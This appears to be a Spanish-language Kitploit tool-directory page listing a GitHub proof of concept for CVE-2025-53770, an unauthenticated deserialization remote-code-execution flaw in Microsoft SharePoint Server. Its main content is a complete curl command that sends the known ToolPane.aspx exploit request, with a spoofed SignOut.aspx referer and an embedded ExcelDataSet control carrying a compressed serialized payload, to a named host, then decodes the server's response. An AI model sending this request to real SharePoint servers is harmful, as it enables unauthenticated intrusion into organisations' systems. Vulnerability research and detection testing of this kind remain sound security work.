Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-53770-SharePoint-Deserialization-RCE-PoC — Una vulnerabilidad crítica en Microsoft SharePoint Server permite la ejecución remota de código no autenticada mediante la deserialización de datos no confiables. Microsoft tiene conocimiento de una explotación activa; aplique las mitigaciones de CVE de inmediato. Gravedad: Crítica. | Kitploit
Herramientas/GitHubGitHub/harryhaxor/cve-2025-53770-sharepoint-deserialization-rce-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubharryhaxor/cve-2025-53770-sharepoint-deserialization-rce-poc

CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
1hace 1 añoAún no revisado

Acerca de

Una vulnerabilidad crítica en Microsoft SharePoint Server permite la ejecución remota de código no autenticada mediante la deserialización de datos no confiables. Microsoft tiene conocimiento de una explotación activa; aplique las mitigaciones de CVE de inmediato. Gravedad: Crítica.

Compartir

CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

Una vulnerabilidad crítica en Microsoft SharePoint Server permite la ejecución remota de código no autenticada mediante la deserialización de datos no confiables. Microsoft está al tanto de la explotación activa; aplique las mitigaciones de CVE de inmediato. Gravedad: Crítica.

comandos

curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx'
-H 'Referer: /_layouts/SignOut.aspx'
-H 'Content-Type: application/x-www-form-urlencoded'
--data-urlencode 'MSOTlPn_Uri=https://reeaccated.com'
--data-urlencode 'MSOTlPn_DWP= <%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %> <asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">

<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</asp:UpdateProgress>'
| grep -oP 'CompressedDataTable="\K[^&]+(?=")'
| base64 -d 2>/dev/null
| gzip -d 2>/dev/null
| tee /tmp/sharepoint_decoded_payload.txt
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Descargar herramienta